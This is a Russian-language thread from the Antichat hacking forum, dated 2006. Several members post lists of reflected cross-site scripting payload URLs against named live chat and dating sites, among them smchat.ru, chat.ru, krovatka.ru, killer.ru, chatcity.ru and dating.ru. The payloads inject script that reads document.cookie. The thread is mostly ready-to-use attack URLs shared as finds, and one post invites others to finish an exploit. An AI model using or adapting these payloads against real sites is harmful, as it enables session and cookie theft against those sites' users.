Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
26.10.2006, 11:43
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Xss на известных чатах
После небольшого затишья своей активности, выкладываю кое что на закуску.
SMCHAT.RU
=======================
http://www.smchat.ru/?key="><script>alert(document.cookie)</script>
http://www.smchat.ru/?chatname=&key="><script>alert(document.cookie)</script>
http://www.smchat.ru/?ontopic=default&login="><script>alert(document.co okie)</script>
http://www.smchat.ru/?activate=&login="><script>alert(document.cookie)</script>
http://www.smchat.ru/?password1=&login="><script>alert(document.cookie) </script>
http://www.smchat.ru/?det=default&login="><script>alert(document.cookie )</script>
http://www.smchat.ru/?count=1000&key="><script>alert(document.cookie)</script>
http://www.smchat.ru/?email=&key="><script>alert(document.cookie)</script>
=======================
Впрочем есть ещё пассивки, но думаю для начала этого хватит.
Последний раз редактировалось [sL1p]; 26.10.2006 в 18:27..
|
|
|
26.10.2006, 18:07
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
CHAT.RU
=======================
http://www.chat.ru/user/register.html?dop10=default&confemail="><script>al ert(document.cookie)</script>
http://www.chat.ru/user/register.html?anotherpw="><script>alert(document.c ookie)</script>
http://www.chat.ru/user/register.html?city=&name="><script>alert(document. cookie)</script>
http://www.chat.ru/user/register.html?action=default&username="><script>al ert(document.cookie)</script>
http://www.chat.ru/user/register.html?city=&year="><script>alert(document. cookie)</script>
=======================
Опять же не весь список. Комбинируя запросы можно хоть сотни таких xss реализовать.
|
|
|
|
27.10.2006, 00:44
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705
Репутация:
1403
|
|
Что касается SMCHAT...
ты првел много ссылок, но в итоге надо оставить тока:
http://www.smchat.ru/?key="><script>alert(document.cookie)</script>
http://www.smchat.ru/?login="><script>alert(document.cookie)</script>
т.к. именно в этих параметрах ты приводил, выход XSS, а остальные ссылки, это льши комбинации...
|
|
|
|
13.11.2006, 21:07
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
KROVATKA.RU
Вот и добрались 
=======================
При нажатии Отмена, xss срабатывает:
Код:
http://klubnichka.krovatka.ru/k?f=45&newwin=1&id2=5816&id=5673xee7kY1Y&c=8"><script>alert(document.cookie)</script>
-----------------------------------------
http://klubnichka.krovatka.ru/f/e.cgi?c=6&n="><script>alert(document.cookie)%3B</script>
http://klubnichka.krovatka.ru/people/pp33.cgi?ch=6&nn="><script>alert(document.cookie)%3B</script>
http://klubnichka.krovatka.ru/sms/xp.cgi?mn="><script>alert(document.cookie)%3B</script>&ch=6&flag=0
http://klubnichka.krovatka.ru/people/pp33.cgi?ch=6&nn=%3Cmeta+http-equiv=%3E%3C/title%3E%20%3Cscript%3Ealert(document.cookie)%3C/script%3E
=======================
XSS Нашли [sL1p] & blackybr
Последний раз редактировалось [sL1p]; 14.11.2006 в 12:32..
|
|
|
|
13.11.2006, 22:13
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Killer.ru
_http://chat.killer.ru/cgi-bin/chat.cgi?session=&room=21&form="><script>alert()</script>
При входе по данной ссылке вылезает алерт и
Код:
Cache-Control: no-store Pragma: no-cache Content-Type: text/html; charset="us-ascii"
Can't open form template.
formpath:
servername: chat.killer.ru
file: /home/serg/chat-2.01/chat-html/">.html
И тут вот сайтик к ним относится тоже:
_http://chat.qwe.ru/index/search.php?q="><script>alert(document.cookie)</script>
Всё отлично вылетает...
Последний раз редактировалось Dr.Check; 13.11.2006 в 23:45..
|
|
|
|
15.11.2006, 19:32
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
CHATCITY.RU
Ухх как xss пошли то=) Уязвимость существует в скрипте отправки сообщений на какой либо ник. Например:
Код:
http://www.Chat ID.chatcity.ru/people/pp33.cgi?c=Chat ID&nn=[sL1p]
Вместо ника, подставляем наш код. В итоге:
Код:
http://www.Chat ID.chatcity.ru/people/pp33.cgi?c=Chat ID&nn="><script>alert(document.cookie)</script>
Chat ID заменяем на адрес чата. У всех они в цифровом значении.
|
|
|
|
21.12.2006, 01:51
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Killer.ru
Код:
_http://chat.killer.ru/cgi-bin/chat.cgi?room=21&form=p_main&other_name="><script>alert(document.cookie)</script>
Выплёвывает такую фигню:
Код:
&last_msg_p="+last_msg; tmp_count++; count_reload++; s=s+"&tmp_count="+tmp_count; hidden.location.href=s; chatstatus((count_reload>2)?1:0); setTimeout("main_reload()", refresh_time); } // === newmsg function add_txt_home(t) { if (msg && msg.new_msg && msg.new_msg.old_message && t) { msg.new_msg.old_message.value = t + msg.new_msg.old_message.value; msg.re_set(); } } function add_txt_end(t) { if (msg && msg.new_msg && msg.new_msg.old_message && t) { msg.new_msg.old_message.value = msg.new_msg.old_message.value + t; msg.re_set(); } } // === execute check_refresh_time(); clr_mmas(); setTimeout("main_reload()", 7000); var smile_on=; // === оформление function smile_txt(to_me,s) { if (!s) return ""; if (to_me && smile_sound=="") smile_sound=s; if (smile_on) return " "; return "*"+s; } function mail_txt(s) { if (!s) return ""; return ""+s+""; } function url_txt(mode,s) { if (!s) return ""; return ""+s+""; } function getval(v) { if (v<10) return "0"+v; return v; } function getdate(t) { if (!t || t<=0) return ""; var d = new Date(1970,1,1); d.setTime(t*1000); var hh=d.getHours(); var nn=d.getMinutes(); var ss=d.getSeconds(); return(getval(hh)+":"+getval(nn)+":"+getval(ss)); } function addmsg(for_me,n,t,nick_color,nick,msg_color,n_msg) { nick_color='6699FF'; var s=""; var tt=getdate(t); var St="["+tt+"] "; if (for_me) set_sound=1; s=St+""+nick+": "+n_msg+"
alert(document.cookie)alert(document.cookie)alert(document.cookie)\n"; add_msg(n,s); } var user_status=3; function put_user_status(t) { var s; if (t==1) s="офлайн"; else if (t==2) s="онлайн"; else if (t==0) s="ушел"; else return; user_status = t; if (msg && msg.ou_status) msg.ou_status.innerHTML = s; } var smiles_flag=0; function show_smiles() { translit_flag=0; if (smiles_flag==1) { leftframe.rows="0,67,*,0,0,49,0"; smiles_flag=0; } else { leftframe.rows="0,67,*,30,0,49,0"; smiles_flag=1; } msg.re_set(); } var translit_flag=0; function translit_show() { smiles_flag=0; if (translit_flag==1) { leftframe.rows="0,67,*,0,0,49,0"; translit_flag=0; } else { leftframe.rows="0,67,*,0,49,49,0"; translit_flag=1; } msg.re_set(); } " scrolling=no marginheight=0 noresize frameborder=0 border=0> " scrolling=no marginheight=0 noresize frameborder=0 border=0> " scrolling=no marginheight=0 noresize frameborder=0 border=0>
Может кто добъёт?! )))))
volchat.ru (Первый по поиску чатов)
Код:
_http://volchat.ru/people/pp1.cgi?c=13397&mn="><script>alert(document.cookie)</script>
_http://volchat.ru/kpobatka?f="><script>alert(document.cookie)</script>
(+)_http://www.postcard.ru/?to="><script>alert(document.cookie)</script>
dating.ru
Код:
http://dating.ru/reg_code.php?details=yes&rndnum="><script>alert(document.cookie)</script>
http://dating.ru/reg.php?rndnum="><script>alert(document.cookie)</script>
Последний раз редактировалось Dr.Check; 21.12.2006 в 02:35..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
